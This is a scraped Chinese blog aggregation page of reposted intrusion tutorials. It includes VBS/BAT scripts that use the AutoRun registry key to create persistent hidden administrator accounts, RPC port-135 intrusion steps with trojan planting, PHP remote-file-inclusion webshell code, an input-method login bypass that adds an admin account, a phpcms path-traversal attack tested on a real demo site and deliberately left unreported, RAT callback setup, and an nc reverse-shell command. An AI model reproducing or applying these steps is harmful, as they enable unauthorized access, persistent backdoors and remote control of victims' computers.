    Nginx调优
    虚拟主机
    重写功能
    负载均衡
    配置文件
    服务器端配置
    客户端配置
    第三阶段: 玩转集群和虚拟化
    课程
    数据库管理
    Linux集群管理
    科目
    MySQL数据库管理
    NoSQL数据库管里
    集群部署
    负载均衡与高可用性集群
    监控服务器集群
    云计算虚拟化
    分布式文件系统Hadoop
    内容
    MySQL数据库概述
    SQL语句
    用户权限管理
    数据导入与导出
    数据库备份与恢复
    MySQL主从架构
    Amoeba读写分离
    MHA高可用性架构
    NoSQL数据库
    Redis部署与管理
    Redis大数据存储
    主从复制架构
    Redis企业解决方案
    集群概念
    KickStart无人值守安装
    Squid代理
    varnish代理
    LVS负载均衡集群
    Keepalived高可用性架构
    Heartbeat高可用性架构
    ISCSI网络存储技术
    SAN存储与NAS存储技术
    RHCS存储集群
    SNMP协议
    Cacti监控服务器集群
    MRTG监控集群
    Nagios监控服务器集群
    Zabbix监控集群
    Cacti+Nagios+NTOP监控平台
    Xen虚拟化技术
    KVM虚拟化技术
    Openstack云计算管理平台
    Cinder块存储
    Swiftt对象存储
    Amazon AWS云平台管理
    Hadoop的架构原理和使用场景
    企业级Hadoop集群的部署
    HDFS分布式文件系统
    HBase分布式数据库
    Hive数据仓库
    大数据集群架构
    第四阶段: 网络安全技术
    课程
    网络安全技术
    科目
    安全管理
    iptables防火墙
    入侵检测策略
    内容
    安全概述和安全原则
    病毒原理与防范
    木马原理与防范
    抓包工具TCPDump
    图形化抓包工具WireShark
    强大的扫描工具Nmap
    非对称加密概述
    PGP非对称加密软件详解
    SELinux安全策略
    防火墙概述
    TCP_wrappers防护机制
    iptables防火墙语法
    常用防火墙脚本
    将iptables作为NAT路由器
    入侵检测概述
    snort入侵检测系统
    RootKit概述
    RootKit检测工具
    展开全文
  • 【转】不死帐号的另类建立

    千次阅读 2011-10-03 11:27:52
    不死帐号的另类建立 建立不死用户 朋友给的启发,注册表里键值 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor AutoRun 可以建立系统自动运行程序 如:c:\1.exe


    不死帐号的另类建立

    建立不死用户

    朋友给的启发,注册表里键值

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor

    AutoRun 可以建立系统自动运行程序

    如:c:\1.exe

    这样 你当打开cmd时候他会运行

    如 过 编译个vbs脚本 的 话

    可以调用bat 文件就可以创建不死用户

    vbs 内容:

    Set ws = CreateObject("Wscript.Shell")

    ws.run "cmd /c yexu.bat",vbhide







    http://www.cn99.com/cgi-bin/getmsg/body?listname=diannao520&id=2

    bat 内容:

    net user yexu killyou /add

    net localgroup administrators yexu /add

    net user yexu /active:yes

    ok了 这样你无论在dos里删除他还是在计算机管理删除他

    只要你动下鼠标他就会 在加 用户可以测试

    建立不死帐号方法2

    dim wsh

    set wsh=createobject("wscript.shell")

    wsh.run "net user guest /active:yes",0 (激活guest账号)

    wsh.run "net user guest hacker",0 (修改guest密码为hacker)

    wsh.run "net localgroup administrators guest /add",0 (添加guest到管理组)


    然后把这个.txt文件的扩展名改为 .vbs即可


    然后打开注册表修改注册标里面的:


    HKEY_local_machine\software\microsoft\command processor\autorun


    在键值里面加入你vbs文件的路径就ok,然后运行vbs文件,不死账号出来拉

    回到目录
     

    快速利用135端口入侵个人电脑  

    发表于: 2008-4-13 00:27 作者: 麦迪 来源: 中国电脑网-社区门户


    通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)


      协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;


      使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。


      下面我就来介绍一下通过135端口入侵的方法。


      (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan"开始"文本框中输入需要扫描的起始地址,然后在"结束"文本框里填写好扫描结束的IP地址,在"扫描类型"选项中选择"所有端口定义"单选按钮,并在右侧的文本框中输入"135"。再点击"开始"按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击"Save"按钮选好保存路径,把里面有漏洞的IP整理下即可。


      (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在"主机文件"处点击"打开"按钮找到我们刚才保存的IP路径,在连接共享$处选择"WMI扫描",在"扫描打开端口的主机"处填写135端口。最后点击"开始"即可。要不了多久就会有结果显示。


      (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那"东风"拉。把刚刚扫描的IP输入TELNET界面的"远程主机"处,以及用户名和密码,不过一般情况下密码都是空。下一步点击"开始执行"按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。


      下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾

    回到目录
     

    教菜鸟如何清除SQL server日志  

    这个问题很多人受到了困扰,日志动辄十几个g


    问:SQLServer中的事务日志应该怎样压缩和删除?


    答:具体方法有3种。


    方法一:


    第一步:



    backup log database_name with no_log或者 backup log database_name with truncate_only




    -- no_log和truncate_only是在这里是同义的,随便执行哪一句都可以。


    第二步:


    1.收缩特定数据库的所有数据和日志文件,执行:



    dbcc shrinkdatabase (database_name,[,target_percent])




    -- database_name是要收缩的数据库名称;target_percent是数据库收缩后的数据库文件中所要的剩余可用空间百分比。


    2.收缩一次一个特定数据库中的数据或日志文件,执行



    dbcc shrinkfile(file_id,[,target_size])




    -- file_id是要收缩的文件的标识 (ID) 号,若要获得文件 ID,请使用 FILE_ID 函数或在当前数据库中搜索 sysfiles;target_size是用兆字节表示的所要的文件大小(用整数表示)。如果没有指定,dbcc shrinkfile 将文件大小减少到默认文件大小。两个dbcc都可以带上参数notruncate或truncateonly,具体意思查看联机帮助.


    方法二:


    第一步:


    先备份整个数据库以备不测 。


    第二步:


    备份结束后,在Query Analyzer中执行如下的语句:



    exec sp_detach_db yourDBName,true




    --卸除这个DB在MSSQL中的注册信息


    第三步:


    到日志的物理文件所在的目录中去删除该日志文件或者将该日志文件移出该目录


    第四步:


    在Query Analyzer中执行如下的语句:



    exec sp_attach_single_file_db yourDBName,'d:\mssql\data\yourDBName_data.mdf '




    --以单文件的方式注册该DB,如果成功则MSSQL将自动为这个DB生成一个500K的日志文件。


    方法三:


    1. 进入企业管理器,选中数据库,比如demo


    2. 所有任务->分离数据库


    3. 到数据库文件的存放目录,将MuOnline_log.LDF文件删除,以防万一,你可以拷出去


    4. 企业管理器->附加数据库,选muonline,这个时候你会看见日志文件这项是一个叉,不要紧,继续,此时数据库就会提示你该数据库无日志是否创建一个新的,确定就是了。


    5. 记得数据库重新附加后用户要重新设置一下。


    如果以后,不想要它变大:


    SQL2000下使用:


    在数据库上点右键->属性->选项->故障恢复-模型-选择-简单模型。


    或用SQL语句:



    alter database 数据库名 set recovery simple

    回到目录
     

    入侵php网站就这么简单  

    今天上网看到了一个网站的URL,引发了我的无限联想,URL形http://xxx.org.tw/index.php?rurl=page01.php,看等于号后面的那部分,明明就是个php文件嘛,我猜想index.php的作用就是将其他php文件放在它的框架内显示出来。如果我们修改这个URL,也许能做些什么。然后我尝试修改URL,看看它能不能显示出boot.ini,提http://xxx.org.tw/index.php?rurl=c:\boot.ini,成功显示出来了.于是在自己的电脑上开了IIS,将phpspy放到目录里,命名为2.php,注意,我这里是没法解析php文件的,只能将其作为文本文件显示.然后提http://xxx.org.tw/index.php?rurl=http://我的IP/2.php,发现我的phpspy作为网页的一部分显示出来了.


    这实际上phpspy还没有存在服务器上,只不过远程包含罢了。形成这种情况的原因是因为index.php里面包含类似于下面的代码:


    if ($_GET[page]) {

    include $_GET[page];

    } else {

    include "index.php";

    }


    没有经过任何的过滤,就将所请求的文件包含进来了,这倒方便了我们拿phpshell。我们可以让其将php的一句话木马包含进来,然后用客户端连接就行了。我这里不用这个方法,换个其他方法,首先将本地的2.php内容写为:


    <  ?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>


    这个的意思就是将指定的文件转存到当前目录下,然后在写一个up.htm,内容如下:

    <  form ENCTYPE="multipart/form-data" ACTION="http://xxx.org.tw/index.php?rurl=http://我的IP/2.php?" METHOD="POST">

    <  input NAME="MyFile" TYPE="file">

    <   input VALUE="提交" TYPE="submit">

    <  /form>


    注意里面的网址要填对,然后就可以上传了.然后发现phpshell就是管理员权限.这实际就是远程文件包含漏洞.




    在另外一个网站上,我也发现了缺少验证的脚本,虽然不至于让服务器沦陷,但是也泄露了不少信息。这个网站提供一些文件的下载,下载的URL形如

    回到目录
     

    又见输入法漏洞  

    追溯到很多年以前,在windows 2000的时代,黑客可以利用输入法漏洞在远程桌面的登录界面前添加管理员帐户,后来微软出了相应的补丁,凡是打了补丁的机器,我们就不能通过ctrl+左shift切换到想要的输入法了。 但是远程桌面是开源的,它在建立连接的开始,是允许我们指定任意的输入法的(前提是远程主机安装了该输入法),所以如果修改相关代码,我们还是可以在远程桌面的登录界面前调出第三方输入法的。下面看实战。


    Windows 2003上实战



    这里的输入法以极点五笔5.1为例

    操作系统是windows server 2003,需要注意的是我们在SP1上的实验失败了(目前正找原因), SP2是可以的,只要不是SP1就行了。

    下面介绍一下Imerdp_Gui.exe这个工具,它是需要.Net支持的,选择想要的输入法(必须是远程服务器已经安装的),填上IP地址,就可以连接远程桌面了.

    如果你没有.Net支持,没关系,可以用命令行的ImeRdp.exe,其实前面的Imerdp_Gui.exe也是调用的ImeRdp.exe。用法:ImeRdp.exe -i [ime文件] [IP:PORT],ime文件是每个输入法都会有的文件,在system32里,例如双拼就是winsp.ime.

    然后就可以连接了,请大家注意图中标出来的输入法已经成为极点五笔了,在极点五笔中,输入";OO"回车,就可以进入系统设置了,在这里,点击界面设置,你会发现有个地方可以让你选择背景,标记出来的位置

    点击之后,出现了"打开"选择框,注意下面的文件类型,它只允许显示bmp文件,无法让它显示所有文件,我们在这个选择框里随便找个文件夹,右键选属性,之后在属性里选择自定义选项卡,然后点更改图标,在更改图标这里,点击浏览,后来跳出的选择框就可以显示所有文件了,马上来到system32,给net.exe在桌面建一个快捷方式,再来到桌面,右键点击该快捷方式,选属性.在属性中,在原有路径里加上user renyuji [密码] /add,点确定。然后的事就是右键点击该快捷方式,选打开,这样执行的命令就是net user renyuji [密码] /add。再之后就是将该快捷方式的路径里的net.exe后加上localgroup administrators renyuji /add,再次右键打开,然后用mstsc登陆就行了,renyuji这个管理员被添加上了.





    后记

     这个方法的思路是很新颖的,我本来以为在今天很难见到输入法漏洞了,想不到原来客户端是可以决定输入法的。利用起来的唯一麻烦就是你不知道远程主机装了哪种第三方输入法,有兴趣的人可以编一个扫描工具,尝试调用远程主机的输入法,如果遇到能利用的输入法,拿到管理员权限就如同探囊取物。当然,这种输入法漏洞作为后门也不错(可以自己尝试修改ime文件的文件名或内容,我觉得还能挖掘出好玩的东西)。


    受影响系统:

    windows 2000 server sp4

    windows 2003 server sp2

    windows 2003 server

    windows vista


    据cnqing提供的信息,vista上可以得到管理员权限的输入法有:sogou输入法,万能五笔,极点五笔,拼音加加。Windows 2003上目前只有极点五笔和拼音加加。更多的输入法利用还等着大家自己去实验。根据我的推测,在英文操作系统里,只要安装了第三方输入法,也是可以调用出来并被利用的。而对于那些非英语国家(拉丁,阿拉伯,日韩等等众多国家)的操作系统同样会出现这个问题。所以,这个漏洞还是很有影响的。

    回到目录
     

    一次简单的php源代码泄露漏洞发掘  

    我们知道在asp中出现得最多的还是sql注入,不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义,所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却使我们能体会到在asp中无法体会的乐趣,我想php自带的文件操作函数能让你为之心跳加快~~嘿嘿


    这次我发掘的是phpcms2007的源代码泄露漏洞


    再次向Phpcms2007的开源行为致敬!!


    开始吧,


    findstr /s /n /i readfile *.php >readfile.txt (结果我只给出有用的)


    其他的文件操作函数可以自己定义查找


    module\picture\show_pic.inc.php:8:readfile($file);


    跟进这个文件看看吧,呵呵,比较小,我喜欢


    [Copy to clipboard] [ - ]CODE:

    defined('IN_PHPCMS') or exit('Access Denied');

    require PHPCMS_ROOT.'/module/'.$mod.'/include/common.inc.php';

    isset($src) or exit;

    $file = PHPCMS_ROOT.'/'.$PHPCMS['uploaddir'].'/'.$CHA['channeldir'].'/'.$MOD['upload_dir'].'/'.$src;

    if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.'/images/error.jpg';

    header("Content-type:image/pjpeg");

    readfile($file);

    ?>

    一路分析下。。。


    先包含文件/module/'.$mod.'/include/common.inc.php


    如果存在变量$src则赋予它路径并把值交给变量$file


    然后就是就进入if


    这里我不看其他的文件简单猜测下应该是判断url路径来源,也就是防盗链的功能


    然后就header()一个图片头


    呵呵,轻轻松松就readfile($file);


    可以看出它没有判断$src的文件类型,如果我们提交一个src=*.php也会被readfile


    好吧,在这里漏洞是出现了


    不过由于"defined('IN_PHPCMS') or exit('Access Denied');",所以我们是无法直接利用这个漏洞文件的


    只能是在其他包含这个文件的php文件中利用


    继续吧


    [Copy to clipboard] [ - ]CODE:

    findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt


    picture\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";

    进去看看


    [Copy to clipboard] [ - ]CODE:

    require "./config.inc.php";

    require "../include/common.inc.php";

    require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";

    ?>

    呵呵,要是register_globals为on的话就可以直接利用这个文件读取目标文件了



    那就测试吧


    官方是演示站是


    [Copy to clipboard] [ - ]CODE:

    http://demo.phpcms.cn/

    那就这样构造url


    [Copy to clipboard] [ - ]CODE:

    /picture/show_pic.php?src=/../../../config.inc.php

    嘿嘿,读取的就是网站的配置文件


    直接访问


    [Copy to clipboard] [ - ]CODE:

    http://demo.phpcms.cn//picture/s ... ./../config.inc.php

    呵呵,猜测没错!!


    那我们可以先访问http://demo.phpcms.cn/抓包


    用nc发包


    get选项就设置为


    [Copy to clipboard] [ - ]CODE:

    /picture/show_pic.php?src=/../../../config.inc.php

    这里我就用刺猬的一个post提交工具代替了



    ok,就分析到这里了


    希望大家不要利用这个做违法的事,嘿嘿!!


    偶是坏孩子,不通知官方了~?好孩子去通知下。

    回到目录
     

    路由内网鸽子上线教程  

    内网真的很麻烦,我看过一些其他的教程录象说的并不详细,或多或少总是遗漏一些关键部分。

    今天就写个详细教程来教教大家怎么样内网上线,保证你100%成功。

    首先我们去http://www.3322.org 申请一个域名,申请完毕后,登入,点击管理域名。看左边选择动态域名,然后新建,名字就大家随便选择了。IP地址填写你公网的IP,其他随便。看公网IP应该不用说了吧。用一个显IP的QQ就可以看到。

    然后下载3322的客户端http://www.3322.org/dyndnspage/setup.exe,就是CN99QDNS客户端,下载完后安装。在程序里打开CN99DQNS 选择管理帐号,依次输入域名、用户名、口令,点增加,这就可以了(以后每次开鸽子钱打开此客户端,然后更新一下你的域名。)

    在F盘新建文件夹,名字为IPIP(名字随便写都可以 在哪个盘也无所谓)。

    接着打开鸽子-工具-FTP服务器:主目录就选择刚才建立的文件夹 F:\IPIP\,服务端口21,用户名就用3322申请的,密码一样,欢迎词随便写。

    在自动保存目录和端口信息和程序启动时自动开启FTP服务上打勾,然后开启服务。

    再来看工具-WEB服务器,主目录同FTP一样 F:\IPIP\,端口写80。

    在自动保存目录和端口信息和程序启动时自动开启WEB服务上打勾,然后开启服务。

    我们是内网,比如说我的电脑内网IP是192.168.1.3,现在进入陆由器。以TP-LINK的为例,在转发规则/虚拟服务器这一栏里,服务端口:21,IP写你自己的IP:192.168.1.3,协议:ALL。然后启用,再开一个,端口为8000其他同上,重启陆由器。

    打开鸽子的服务器配置/自动上线设置。在IP同址HTTP访问地址、DNS解析域名或固定IP:这里填上在3322申请的域名 比如我申请的是aabb.3322.org,这里填上aabb.3322.org 就可以了。然后其他的就随便大家怎么填了,最后生成一个服务端。

    打开鸽子自动上线:

    FTP服务器填:aabb.3322.ORG,端口:21,用户名和密码就是3322申请的那个。

    存放IP的文件,IP.TXT。

    IP文件内容:这里很关键,因为我们是内网,所以我们要这样写:

    比如说我现在的内网IP是192.168.1.3,外网是:218.16.75.85,这里就写成218.16.75.85:8000。千万不能写内网的IP,现在大家大部分都是动态的IP,所以外网IP变动一次这里就要重新设置。重新开启鸽子时也要重新填写一下XX.XX.XX.XX:8000

    回到目录
     

    简述常见黑客入侵方法以及工具防范  

    工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。  1. 1433端口入侵我爱电脑技术论坛6 K, N8 \7 e# X8 A


     查有1433的机器

    SQLScanPass.exe 进行字典暴破(字典是关键)


      最后 SQLTools.exe入侵打造最好的电脑自学交流论坛9 r% W3 L2 R7 {7 r


      对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

      nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

    {

      (以上反向的,测试成功)


    sqlhelloz.exe 入侵ip 1433 (这个是正向连接)


      2. 4899端口入侵


     用4899过滤器.exe,扫描空口令的机器


     N打造最好的电脑自学交流论坛  

      3. 3899的入侵


      对很早的机器,可以试试3389的溢出  对2000的机器,可以试试字典暴破。

    0

       4. 80入侵  对sp3以前的机器,可以用webdav入侵;

    `打造最好的电脑自学交流论坛

     对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

     可以利用SQL进行注入。(小榕的注入软件)。


      5. serv-u入侵(21端口)  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

     E; \- ^% D" E4 n/ y- Y7 N7 F: n  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

      对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A, M" N

     6. 554端口

    用real554.exe入侵。

      7. 6129端口


      用DameWare6129.exe入侵。

      8. 系统漏洞

    利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

    进行溢出入侵。

      9. 3127等端口  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

    利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。












    展开全文
  • 个人渗透笔记

    千次阅读 2016-07-10 18:32:59
    【 拿shell 】 1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞":1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls 2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本...
  • CTF-练习平台 writeup web

    万次阅读 2018-03-22 16:23:17
    bugku Web WriteUp 刚刚接触ctf没多久,做ctf-练习平台上的题目,有些新的题目,在网上没有找到对应的writeup,所以做了之后就想自己写一个,也顺便理理自己的思路。(没有太多经验…可能对有些题目的理解还不深刻...
  • 这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。...本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和...
  • [转]信息安全相关理论题(四)

    千次阅读 2019-02-18 15:53:33
    26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。 A、 2xx B、 3xx C、 4xx D、 5xx 您的答案: 标准答案: C 27、买家称购买商品异常后的正确操作是立即咨询官方客服。 A、 正确 ...您的答案: 标准答案:...
  • google黑客命令搜集

    千次阅读 2018-11-25 09:14:56
    关于google hack的几个基础过滤器使用[请务必谨记,过滤器虽然是死的,但人是活的,把自己的脑洞放到最大,才能拼装出高质量dorks]: intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web...
  • [转]信息安全相关理论题(二)

    千次阅读 2019-02-18 15:43:47
    27、在工程实施之前,验收方可以不给施工方弱电布线图纸,但施工结束后必须有图纸 A、 对 B、 错 您的答案: 标准答案: B 28、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是 A、 传输层 ...
  • 关于PHP中的webshell

    千次阅读 2019-01-07 10:53:10
    黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,...
  • 新手入侵笔记

    千次阅读 2019-01-10 01:37:01
    【 拿shell 】  1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls  2.上传图片木马遇到拦截系统,连图片木马都上传不了,...
  • 渗透测试之信息收集(下篇)

    千次阅读 2019-11-07 22:51:44
    大牛、大咖、大V…………,大表哥应该不算。 从一个脚本小子升级为大子辈,其实是真正想从事安全事业的人的究极理想。对于信息收集阶段而言,会用各种工具,最多也就算会了一半,或许也就三分之一。信息收集行当...
  • 信息收集

    千次阅读 2020-03-05 19:04:45
    信息搜集 正所谓“知己知彼,百战百胜”,信息收集就像一场战争中的“深入敌后”的一项“情报收集”任务。在开始渗透测试工作之前,我们通过要对目标使用各种工具进行信息收集工作,找出目标的漏洞和弱点,然后利用...
  • 1.1 Mysql信息收集 1.端口信息收集 Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用: (1)IIS PUT scanner,直接填写3306端口,IP地址填写单个或者C段地址,...
  • 笔记,后期整理

    千次阅读 2019-09-29 12:48:13
    VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit...10 进制0-9组成的数字...
  • 摘要:11月4日,阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击,攻击者可以利用该漏洞远程植入webshell,导致文件篡改、数据泄漏、服务器被远程控制等一系列严重问题。建议受影响用户尽快...
  • 2018年10月27日接到新客户网站服务器被上传了webshell脚本木马后门问题的求助,对此我们sine安全公司针对此阿里云提示的安全问题进行了详细分析,ECS服务器被阿里云提示异常网络连接-可疑WebShell通信行为,还会伴有,...
  • 本文作者:阿乐你好上个月5月9号发了两个HW红方弹药库的,今天再来发一个红队作战人员手册,我大概看了看手册里面的exp零组文档包含了很多,本文来自 klionsec的github说明以下...
1 2 3
收藏数 48
精华内容 19
关键字:

phpcmsv9入侵shell